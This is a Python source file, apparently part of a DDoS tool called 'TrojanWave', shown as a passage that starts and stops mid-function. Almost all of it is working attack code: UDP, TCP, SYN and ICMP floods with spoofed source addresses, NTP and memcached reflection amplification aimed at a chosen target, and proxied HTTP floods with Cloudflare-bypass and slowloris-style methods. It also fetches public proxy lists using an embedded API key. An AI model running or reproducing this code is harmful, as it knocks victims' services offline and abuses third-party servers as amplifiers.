header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "socket":
header = ""
elif method == "null":
connection = "Connection: null\r\n"
accept = Choice(acceptall) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
referer = "Referer: null\r\n"
useragent = "User-Agent: null\r\n"
header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
refer = "Referer: http://" + target + path + "\r\n"
user_agent = "User-Agent: " + UserAgent + "\r\n"
accept = Choice(acceptall) + "\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
data = str(random._urandom(8))
length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n"
header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
elif method == "hit":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
refer = "Referer: http://" + target + path + "\r\n"
user_agent = "User-Agent: " + UserAgent + "\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
accept = Choice(acceptall) + "\r\n"
data = str(random._urandom(8))
length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n"
header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def UrlFixer(original_url):
global target, path, port, protocol
original_url = original_url.strip()
url = ""
path = "/"
clear_screen()
url = str(input("Insert IP/Web http://"))
port = str(input("Insert Port: "))
protocol = "http"
tmp = url.split("/")
if (port=="443"):
protocol = "https"
website = tmp[0]
check = website.split(":")
target = check[0]
if len(tmp) > 1:
path = url.replace(website, "", 1)
def udp(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while time.time() < timer:
try:
try:
data = random._urandom(int(Intn(1024, 60000)))
for _ in range(multiple):
s.sendto(data, (str(target), int(port)))
except:
s.close()
except:
s.close()
def icmp(event, timer):
event.wait()
while time.time() < timer:
try:
for _ in range(multiple):
packet = random._urandom(int(Intn(1024, 60000)))
pig(target, count=10, interval=0.2, payload_size=len(packet), payload=packet)
except:
pass
ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4
def ntp(event, timer):
packets = Intn(10, 150)
server = Choice(ntpsv)
event.wait()
while time.time() < timer:
try:
packet = (
IP(dst=server, src=target)
/ UDP(sport=Intn(1, 65535), dport=int(port))
/ Raw(load=ntp_payload)
)
try:
for _ in range(multiple):
send(packet, count=packets, verbose=False)
except:
pass
except:
pass
mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
def mem(event, timer):
event.wait()
packets = Intn(1024, 60000)
server = Choice(memsv)
while time.time() < timer:
try:
try:
packet = (
IP(dst=server, src=target)
/ UDP(sport=port, dport=11211)
/ Raw(load=mem_payload)
)
for _ in range(multiple):
send(packet, count=packets, verbose=False)
except:
pass
except:
pass
def tcp(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while time.time() < timer:
try:
data = random._urandom(int(Intn(1024, 60000)))
address = (str(target), int(port))
try:
s.connect(address)
for _ in range(multiple):
s.send(data)
except:
s.close()
except:
s.close()
def vse(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while time.time() < timer:
try:
address = (str(target), int(port))
try:
s.connect(address)
for _ in range(multiple):
s.send(data)
except:
s.close()
except:
s.close()
class DNSQuery:
def __init__(self, data):
self.data = data
self.dominio = ''
self.DnsType = ''
HDNS=data[-4:-2].encode("hex")
if HDNS == "0001":
self.DnsType='A'
elif HDNS == "000f":
self.DnsType='MX'
elif HDNS == "0002":
self.DnsType='NS'
elif HDNS == "0010":
self.DnsType="TXT"
else:
self.DnsType="Unknown"
tipo = (ord(data[2]) >> 3) & 15 # Opcode bits
if tipo == 0: # Standard query
ini=12
lon=ord(data[ini])
while lon != 0:
self.dominio+=data[ini+1:ini+lon+1]+'.'
ini+=lon+1
lon=ord(data[ini])
def respuesta(self, ip):
packet=''
if self.dominio:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts
packet+=self.data[12:] # Original Domain Name Question
packet+='\xc0\x0c' # Pointer to domain name
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
return packet
def dns(event, timer):
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('',53))
data, addr = s.recvfrom(1024)
p = DNSQuery(data)
for _ in range(multiple):
s.sendto(p.respuesta(target), addr)
except:
s.close()
def syn(event, timer):
event.wait()
while time.time() < timer:
try:
IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = target
TCP_Packet = TCP ()
TCP_Packet.sport = randint(1, 65535)
TCP_Packet.dport = int(port)
TCP_Packet.flags = "S"
TCP_Packet.seq = randint(1000, 9000)
TCP_Packet.window = randint(1000, 9000)
for _ in range(multiple):
send(IP_Packet/TCP_Packet, verbose=0)
except:
pass
def pod(event, timer):
event.wait()
while time.time() < timer:
try:
rand_addr = spoofer()
ip_hdr = IP(src=rand_addr, dst=target)
packet = ip_hdr / ICMP() / ("m" * 60000)
send(packet)
except:
pass
def stop():
print('All Attacks Stopped !')
os.system('pkill python*')
exit()
def dyn(event, socks_type):
header = Headers("dyn")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def http(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def capb(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def ovh(event, socks_type):
header = Headers("ovh")
proxy = Choice(proxies).strip().split(":")
get_host = "HEAD " + path + "/" + str(Intn(1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def pps(event, socks_type):
proxy = Choice(proxies).strip().split(":")
request = Headers("pps")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def even(event, socks_type):
global proxy
proxy = Choice(proxies).strip().split(":")
header = Headers("even")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def brust(event, socks_type):
global proxy
proxy = Choice(proxies).strip().split(":")
header = Headers("brust")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def cookie(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("cookie")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def cfb(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
cfscrape.create_scraper(sess=s)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
# def tor(event, socks_type):
# event.wait()
# while time.time() < timer:
# with tor_requests_session() as s:
# s.get(sys.argv[2])
def AVB(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
payload = str(random._urandom(64))
while time.time() < timer:
try:
s = cfscrape.create_scraper()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
for _ in range(multiple):
s.post(sys.argv[2], timeout=1, data=payload)
except:
s.close()
except:
s.close()
def bypass(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
payload = str(random._urandom(64))
while time.time() < timer:
try:
s = requests.Session()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
for _ in range(multiple):
s.post(sys.argv[2], timeout=1, data=payload)
except:
s.close()
except:
s.close()
def dgb(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = cfscrape.create_scraper()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
sleep(5)
for _ in range(multiple):
s.get(sys.argv[2])
except:
s.close()
except:
s.close()
def head(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("head")
head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def null(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("null")
head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def gsb(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("head")
head_host = "HEAD " + path + "?q=" + str(Intn(000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
sleep(5)
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def hit(event, timer):
global s
request = Headers("hit")
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(target), int(port)))
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def cfbc(event, socks_type):
request = Headers("cfb")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def post(event, socks_type):
request = Headers("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def stress(event, socks_type):
request = Headers("stress")
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def ostress(event, timer):
request = Headers("stress")
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(target), int(port)))
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
socket_list = []
t = 0
def slow(conn, socks_type):
global t
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
header = Headers("get")
request = get_host + header
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
for _ in range(conn):
try:
s.send(request) * conn
t += 1
sys.stdout.write("Connections = " + t + "\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")
except:
s.close()
proxy = Choice(proxies).strip().split(":")
def checking(lines, socks_type, ms):
global nums, proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
proxies.remove(lines)
return
err = 0
while True:
if err == 3:
proxies.remove(lines)
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
s.close()
break
except:
err += 1
nums += 1
nums = 0
def check_socks(ms):
global nums
thread_list = []
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking, args=(lines, 5, ms,))
th.start()
if choice == "4":
th = threading.Thread(target=checking, args=(lines, 4, ms,))
th.start()
if choice == "1":
th = threading.Thread(target=checking, args=(lines, 1, ms,))
th.start()
thread_list.append(th)
sleep(0.01)
for th in list(thread_list):
th.join()
ans = "y"
if ans == "y" or ans == "":
if choice == "4":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
elif choice == "5":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
elif choice == "1":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
def check_list(socks_file):
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i, encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
global out_file
if choice == "4":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks4&lastchecked=60",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:
req = requests.get("https://www.socks-proxy.net/", timeout=5, headers={"User-Agent", UserAgent}).text
part = str(req)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies = proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open(out_file, "a")
out_file.write(proxies)
out_file.close()
except:
pass
if choice == "5":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks5&lastchecked=60",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex",
timeout=5)
f.write(r.content)
f.close()
except:
f.close()
if choice == "1":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=http", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=http", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=http&lastchecked=60",
timeout=5)
f.write(r.content)
f.close()
except:
f.close()
def main():
global proxies, multiple, choice, timer, out_file
method = str(sys.argv[1]).lower()
out_file = str("files/proxys/" + sys.argv[5])
if not os.path.exists(out_file):
makefile(out_file)
if method == "check":
proxydl(out_file, socks_type)
exit()
if method == "stop":
url = str(sys.argv[2]).strip()
UrlFixer(url)
stop()
elif (method == "help") or (method == "h"):
usge()
elif (method == "check"):
pass
elif str(method.upper()) not in str(methods):
print("method not found")
exit()
timer = int(time.time()) + int(sys.argv[7])
url = str(sys.argv[2]).strip()
UrlFixer(url)
choice = str(sys.argv[3]).strip()
if choice != "4" and choice != "5" and choice != "1":
print("Socks Type Not Found [4, 5, 1]")
exit()
if choice == "4":
socks_type = 4
elif choice == "1":
socks_type = 1
else:
socks_type = 5
threads = int(sys.argv[4])
proxies = open(out_file).readlines()
if method == "slow":
conn = threads
proxydl(out_file, socks_type)
print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums)))
for _ in range(conn):
threading.Thread(target=slow, args=(conn, socks_type), daemon=True).start()
else:
multiple = str((sys.argv[6]))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
event = threading.Event()
start_attack(method, threads, event, socks_type)
event.clear()
event.set()
while True:
try:
sleep(0.1)
except KeyboardInterrupt:
break
def proxydl(out_file, socks_type):
global proxies, multiple, choice, data
ms = 1
if socks_type == 1:
socktyper = "HTTP"
if socks_type == 4:
socktyper = "SOCKS4"
if socks_type == 5:
socktyper = "SOCKS5"
print("downloading {}'s proxy plz wait".format(socktyper))
downloadsocks(choice)
proxies = open(str(out_file)).readlines()
check_list(out_file)
check_socks(ms)
bds = 0
# layer tool :||||||||||||
def toolgui():
global bds
tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n")
if bds == 0:
print('''
Tools:
''' + tos+ '''
Other:
Clear
Exit
''')
bds = 1
tool = input(socket.gethostname() + "@"+name+":~# ").lower()
if tool != "e" and (tool != "exit") and (tool != "q") and (tool != "quit") and (tool != "logout") and (
tool != "close"):
pass
else:
exit()
if tool == "cfip":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
cfip(domain)
return tools()
elif tool == "dstat":
print(tool + ": command ready")
return tools()
elif tool == "dns":
return tools()
elif tool == "check":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
check(domain)
return tools()
elif tool == "ping":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
piger(domain)
return tools()
elif tool == "info":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
piger(domain)
return tools()
elif (tool == "help") or (tool == "h") or (tool == "?"):
tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n")
print('''
Tools:
{tos}
Other:
Clear
Exit
''')
return tools()
elif (tool == "cls") or (tool == 'clear') or (tool == 'c'):
print("\033[H\033[J")
return tools()
elif not tool:
return tools()
elif " " in tool:
return tools()
elif " " in tool:
return tools()
elif " " in tool:
return tools()
elif "\n" in tool:
return tools()
elif "\r" in tool:
return tools()
else:
print(tool + ": command not found")
return tools()
def tools():
global domain, name
name = "TrojanWave"
try:
tool = sys.argv[2].lower()
if tool != "dstat":
domain = sys.argv[3]
if str('.') not in str(domain):
print('address not found')
toolgui()
if tool == "cfip":
cfip(domain)
elif tool == "dns":
print(tool + ": comming soon !")
